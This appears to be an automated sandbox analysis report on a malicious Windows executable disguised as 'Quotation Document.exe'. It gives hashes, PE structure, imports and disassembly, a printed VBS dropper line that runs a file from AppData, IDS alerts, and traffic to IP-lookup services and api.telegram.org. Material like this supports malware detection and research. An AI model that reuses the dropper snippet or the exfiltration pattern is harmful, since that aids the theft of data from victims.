SSDEEP:	6:DMM8lfm3OOQdUfcloRKUEZ+lX1AlflYeZmLnriIM8lfQVn:DsO+vNloRKQ1AlflYeYzmA2n
MD5:	67E9199FDAA17EB181AA5048FFE0A226
SHA1:	096852458ADE248BB690984AF8BCEEE40FF12ECC
SHA-256:	1E6757F9367A9FE0BF0D82B07624EF5991F4A8581F533C40E889BAAB71C0495E
SHA-512:	75F226C4EC087AD3C0B5BAA52DE667A3518836EF930F079234092E924D40A525AC6D6E693214AB90798FB2B311C7FBD5163BD3D4D43702E9A2DD75C80993CCC7
Malicious:	true
Reputation:	low
Preview:	S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.e.m.b.o.w.e.l.i.n.g.\.n.e.o.p.h.o.b.i.a...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.298173654239306
TrID:	Win32 Executable (generic) a (10002005/4) 95.11% AutoIt3 compiled script executable (510682/80) 4.86% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Quotation Document.exe
File size:	1'175'717 bytes
MD5:	cd3c7f532dcffd81361915bf691cfbd0
SHA1:	ddaa78fa6df0b9f19a0b7c9e8f54c4224f6a7a14
SHA256:	5e3521bee81bb39dae47648627ea8810f88dc0a16055efa1eadd779f804f60f1
SHA512:	d22b4f09fe235b8cbe6827c7158becf3573a4e5da6bb4f22e54055376195bfd812d8642969b9b2f917598b227facedd99c82c914e96b3fa5658b77bf83372f25
SSDEEP:	12288:ALkcoxg7v3qnC11ErwIhh0F4qwUgUny5QLURDWlWWUXVDioc0ELeN3FuYy96QX4w:WfmMv6Ckr7Mny5QLURKgWod7TgIQXae
TLSH:	3F45BF22B2D640F5E9923D721D26E316BF766D158622C48FD7A03EF64A33340D6263F6
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i...i...i.....9.k...`.:.w...`.,.....`.+.P...N%..c...N%..H...i...d...`. ./...w.:.k...w.;.h...i.8.h...`.>.h...Richi..........

File Icon


Icon Hash:	cf818c848c8a814f

Static PE Info

General

Entrypoint:	0x416310
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x4B93CF87 [Sun Mar 7 16:08:39 2010 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	aaaa8913c89c8aa4a5d93f06853894da

Entrypoint Preview

Instruction
call 00007FE51CB8607Ch
jmp 00007FE51CB79E4Eh
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push edi
push esi
mov esi, dword ptr [ebp+0Ch]
mov ecx, dword ptr [ebp+10h]
mov edi, dword ptr [ebp+08h]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FE51CB79FDAh
cmp edi, eax
jc 00007FE51CB7A17Ah
cmp ecx, 00000100h
jc 00007FE51CB79FF1h
cmp dword ptr [004A94E0h], 00000000h
je 00007FE51CB79FE8h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007FE51CB79FDAh
pop esi
pop edi
pop ebp
jmp 00007FE51CB7A43Ah
test edi, 00000003h
jne 00007FE51CB79FE7h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007FE51CB79FFCh
rep movsd
jmp dword ptr [00416494h+edx*4]
nop
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007FE51CB79FDEh
and eax, 03h
add ecx, eax
jmp dword ptr [004163A8h+eax*4]
jmp dword ptr [004164A4h+ecx*4]
nop
jmp dword ptr [00416428h+ecx*4]
nop
mov eax, E4004163h
arpl word ptr [ecx+00h], ax
or byte ptr [ecx+eax*2+00h], ah
and edx, ecx
mov al, byte ptr [esi]
mov byte ptr [edi], al
mov al, byte ptr [esi+01h]
mov byte ptr [edi+01h], al
mov al, byte ptr [esi+02h]
shr ecx, 02h
mov byte ptr [edi+02h], al
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007FE51CB79F9Eh

Rich Headers

Programming Language:

[ASM] VS2008 SP1 build 30729
[ C ] VS2008 SP1 build 30729
[C++] VS2008 SP1 build 30729
[ C ] VS2005 build 50727
[IMP] VS2005 build 50727
[ASM] VS2008 build 21022
[RES] VS2008 build 21022
[LNK] VS2008 SP1 build 30729

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8cd3c	0x154	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xab000	0x136e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x82000	0x840	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x80017	0x80200	6c20c6bf686768b6f134f5bd508171bc	False	0.5602991615853659	data	6.634688230255595	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x82000	0xd95c	0xda00	f979966509a93083729d23cdfd2a6f2d	False	0.36256450688073394	data	4.880040824124099	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x90000	0x1a518	0x6800	e5d77411f751d28c6eee48a743606795	False	0.1600060096153846	data	2.2017649896261107	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xab000	0x136e8	0x13800	25f5ac98668909564a535af77849da6e	False	0.08760266426282051	data	3.8826931644611715	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xab448	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xab570	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xab698	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xab7c0	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 67584	English	Great Britain	0.05220040222406246
RT_MENU	0xbbfe8	0x50	data	English	Great Britain	0.9
RT_DIALOG	0xbc038	0xfc	data	English	Great Britain	0.6507936507936508
RT_STRING	0xbc138	0x530	data	English	Great Britain	0.33960843373493976
RT_STRING	0xbc668	0x690	data	English	Great Britain	0.26964285714285713
RT_STRING	0xbccf8	0x43a	data	English	Great Britain	0.3733826247689464
RT_STRING	0xbd138	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xbd738	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xbdd98	0x388	data	English	Great Britain	0.377212389380531
RT_STRING	0xbe120	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	United States	0.502906976744186
RT_GROUP_ICON	0xbe278	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xbe290	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xbe2a8	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xbe2c0	0x14	data	English	Great Britain	1.25
RT_VERSION	0xbe2d8	0x19c	data	English	Great Britain	0.5339805825242718
RT_MANIFEST	0xbe478	0x26c	ASCII text, with CRLF line terminators	English	United States	0.5145161290322581

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
VERSION.dll	VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
MPR.dll	WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
PSAPI.DLL	EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
USERENV.dll	CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
KERNEL32.dll	HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, MultiByteToWideChar, WideCharToMultiByte, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, lstrcmpiW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, GetProcessHeap, OutputDebugStringW, GetLocalTime, CompareStringW, CompareStringA, InterlockedIncrement, InterlockedDecrement, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetComputerNameW, GetWindowsDirectoryW, GetSystemDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ResumeThread, GetStartupInfoW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, SetLastError, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetModuleFileNameA, HeapReAlloc, HeapCreate, SetHandleCount, GetFileType, GetStartupInfoA, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, LCMapStringA, RtlUnwind, SetFilePointer, GetTimeZoneInformation, GetTimeFormatA, GetDateFormatA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, GetTickCount, GetStringTypeA, GetStringTypeW, GetLocaleInfoA, GetModuleHandleA, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, CreateFileA, SetEndOfFile, EnumResourceNamesW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, CopyImage, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, PeekMessageW, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, MoveWindow, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, GetMenuItemID, TranslateMessage, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, UnregisterHotKey, CharLowerBuffW, MonitorFromRect, keybd_event, LoadImageW, GetWindowLongW
GDI32.dll	DeleteObject, GetObjectW, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, PolyDraw, BeginPath, Rectangle, GetDeviceCaps, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, SetViewportOrgEx
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, RegEnumKeyExW, CloseServiceHandle, UnlockServiceDatabase, LockServiceDatabase, OpenSCManagerW, InitiateSystemShutdownExW, AdjustTokenPrivileges, RegCloseKey, RegQueryValueExW, RegOpenKeyExW, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, SetSecurityDescriptorDacl, CopySid, LogonUserW, GetTokenInformation, GetAclInformation, GetAce, AddAce, GetSecurityDescriptorDacl
SHELL32.dll	DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, StringFromCLSID, IIDFromString, StringFromIID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize
OLEAUT32.dll	SafeArrayAllocData, SafeArrayAllocDescriptorEx, SysAllocString, OleLoadPicture, SafeArrayGetVartype, SafeArrayDestroyData, SafeArrayAccessData, VarR8FromDec, VariantTimeToSystemTime, VariantClear, VariantCopy, VariantInit, SafeArrayDestroyDescriptor, LoadRegTypeLib, GetActiveObject, SafeArrayUnaccessData

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-01T00:37:15.917486+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49730	TCP
2024-11-01T00:37:55.525342+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	20.12.23.50	443	192.168.2.4	49736	TCP
2024-11-01T00:38:46.434821+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49826	193.122.6.168	80	TCP
2024-11-01T00:38:52.887926+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49826	193.122.6.168	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 00:38:45.289541006 CET	49826	80	192.168.2.4	193.122.6.168
Nov 1, 2024 00:38:45.294693947 CET	80	49826	193.122.6.168	192.168.2.4
Nov 1, 2024 00:38:45.294768095 CET	49826	80	192.168.2.4	193.122.6.168
Nov 1, 2024 00:38:45.294976950 CET	49826	80	192.168.2.4	193.122.6.168
Nov 1, 2024 00:38:45.299787998 CET	80	49826	193.122.6.168	192.168.2.4
Nov 1, 2024 00:38:46.131339073 CET	80	49826	193.122.6.168	192.168.2.4
Nov 1, 2024 00:38:46.137242079 CET	49826	80	192.168.2.4	193.122.6.168
Nov 1, 2024 00:38:46.142038107 CET	80	49826	193.122.6.168	192.168.2.4
Nov 1, 2024 00:38:46.382054090 CET	80	49826	193.122.6.168	192.168.2.4
Nov 1, 2024 00:38:46.394105911 CET	49827	443	192.168.2.4	188.114.96.3
Nov 1, 2024 00:38:46.394136906 CET	443	49827	188.114.96.3	192.168.2.4
Nov 1, 2024 00:38:46.394256115 CET	49827	443	192.168.2.4	188.114.96.3
Nov 1, 2024 00:38:46.407185078 CET	49827	443	192.168.2.4	188.114.96.3
Nov 1, 2024 00:38:46.407200098 CET	443	49827	188.114.96.3	192.168.2.4
Nov 1, 2024 00:38:46.434820890 CET	49826	80	192.168.2.4	193.122.6.168
Nov 1, 2024 00:38:47.027597904 CET	443	49827	188.114.96.3	192.168.2.4
Nov 1, 2024 00:38:47.027770996 CET	49827	443	192.168.2.4	188.114.96.3
Nov 1, 2024 00:38:47.032037973 CET	49827	443	192.168.2.4	188.114.96.3
Nov 1, 2024 00:38:47.032052040 CET	443	49827	188.114.96.3	192.168.2.4
Nov 1, 2024 00:38:47.032335997 CET	443	49827	188.114.96.3	192.168.2.4
Nov 1, 2024 00:38:47.075400114 CET	49827	443	192.168.2.4	188.114.96.3
Nov 1, 2024 00:38:47.085252047 CET	49827	443	192.168.2.4	188.114.96.3
Nov 1, 2024 00:38:47.131329060 CET	443	49827	188.114.96.3	192.168.2.4
Nov 1, 2024 00:38:47.227523088 CET	443	49827	188.114.96.3	192.168.2.4
Nov 1, 2024 00:38:47.227608919 CET	443	49827	188.114.96.3	192.168.2.4
Nov 1, 2024 00:38:47.227709055 CET	49827	443	192.168.2.4	188.114.96.3
Nov 1, 2024 00:38:47.246311903 CET	49827	443	192.168.2.4	188.114.96.3
Nov 1, 2024 00:38:52.402282000 CET	49826	80	192.168.2.4	193.122.6.168
Nov 1, 2024 00:38:52.602669001 CET	80	49826	193.122.6.168	192.168.2.4
Nov 1, 2024 00:38:52.842931986 CET	80	49826	193.122.6.168	192.168.2.4
Nov 1, 2024 00:38:52.856843948 CET	49828	443	192.168.2.4	149.154.167.220
Nov 1, 2024 00:38:52.856880903 CET	443	49828	149.154.167.220	192.168.2.4
Nov 1, 2024 00:38:52.856940031 CET	49828	443	192.168.2.4	149.154.167.220
Nov 1, 2024 00:38:52.857371092 CET	49828	443	192.168.2.4	149.154.167.220
Nov 1, 2024 00:38:52.857383013 CET	443	49828	149.154.167.220	192.168.2.4
Nov 1, 2024 00:38:52.887926102 CET	49826	80	192.168.2.4	193.122.6.168
Nov 1, 2024 00:38:53.696963072 CET	443	49828	149.154.167.220	192.168.2.4
Nov 1, 2024 00:38:53.697046995 CET	49828	443	192.168.2.4	149.154.167.220
Nov 1, 2024 00:38:53.698821068 CET	49828	443	192.168.2.4	149.154.167.220
Nov 1, 2024 00:38:53.698832989 CET	443	49828	149.154.167.220	192.168.2.4
Nov 1, 2024 00:38:53.699074030 CET	443	49828	149.154.167.220	192.168.2.4
Nov 1, 2024 00:38:53.700611115 CET	49828	443	192.168.2.4	149.154.167.220
Nov 1, 2024 00:38:53.743350029 CET	443	49828	149.154.167.220	192.168.2.4
Nov 1, 2024 00:38:53.743485928 CET	49828	443	192.168.2.4	149.154.167.220
Nov 1, 2024 00:38:53.743494987 CET	443	49828	149.154.167.220	192.168.2.4
Nov 1, 2024 00:38:54.124676943 CET	443	49828	149.154.167.220	192.168.2.4
Nov 1, 2024 00:38:54.169142962 CET	49828	443	192.168.2.4	149.154.167.220
Nov 1, 2024 00:38:54.169166088 CET	443	49828	149.154.167.220	192.168.2.4
Nov 1, 2024 00:38:54.169523001 CET	49828	443	192.168.2.4	149.154.167.220
Nov 1, 2024 00:38:54.169620037 CET	443	49828	149.154.167.220	192.168.2.4
Nov 1, 2024 00:38:54.169673920 CET	49828	443	192.168.2.4	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 1, 2024 00:38:45.276662111 CET	51202	53	192.168.2.4	1.1.1.1
Nov 1, 2024 00:38:45.283238888 CET	53	51202	1.1.1.1	192.168.2.4
Nov 1, 2024 00:38:46.385384083 CET	59509	53	192.168.2.4	1.1.1.1
Nov 1, 2024 00:38:46.392575979 CET	53	59509	1.1.1.1	192.168.2.4
Nov 1, 2024 00:38:52.848078966 CET	51622	53	192.168.2.4	1.1.1.1
Nov 1, 2024 00:38:52.856120110 CET	53	51622	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 1, 2024 00:38:45.276662111 CET	192.168.2.4	1.1.1.1	0x5551	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Nov 1, 2024 00:38:46.385384083 CET	192.168.2.4	1.1.1.1	0xe7fe	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Nov 1, 2024 00:38:52.848078966 CET	192.168.2.4	1.1.1.1	0xa933	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 1, 2024 00:38:45.283238888 CET	1.1.1.1	192.168.2.4	0x5551	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Nov 1, 2024 00:38:45.283238888 CET	1.1.1.1	192.168.2.4	0x5551	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Nov 1, 2024 00:38:45.283238888 CET	1.1.1.1	192.168.2.4	0x5551	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Nov 1, 2024 00:38:45.283238888 CET	1.1.1.1	192.168.2.4	0x5551	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Nov 1, 2024 00:38:45.283238888 CET	1.1.1.1	192.168.2.4	0x5551	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Nov 1, 2024 00:38:45.283238888 CET	1.1.1.1	192.168.2.4	0x5551	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Nov 1, 2024 00:38:46.392575979 CET	1.1.1.1	192.168.2.4	0xe7fe	No error (0)	reallyfreegeoip.org		188.114.96.3	A (IP address)	IN (0x0001)	false
Nov 1, 2024 00:38:46.392575979 CET	1.1.1.1	192.168.2.4	0xe7fe	No error (0)	reallyfreegeoip.org		188.114.97.3	A (IP address)	IN (0x0001)	false
Nov 1, 2024 00:38:52.856120110 CET	1.1.1.1	192.168.2.4	0xa933	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

reallyfreegeoip.org

api.telegram.org

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49826	193.122.6.168	80	8080	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Nov 1, 2024 00:38:45.294976950 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Nov 1, 2024 00:38:46.131339073 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 23:38:46 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b50416b13e2997ae527c4ed3a9e5c460 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Nov 1, 2024 00:38:46.137242079 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Nov 1, 2024 00:38:46.382054090 CET	323	IN	HTTP/1.1 200 OK Date: Thu, 31 Oct 2024 23:38:46 GMT Content-Type: text/html Content-Length: 106 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache X-Request-ID: b8b3639c320ef627848471cb0ff78040 Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 37 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 173.254.250.77</body></html>
Nov 1, 2024 00:38:52.402282000 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
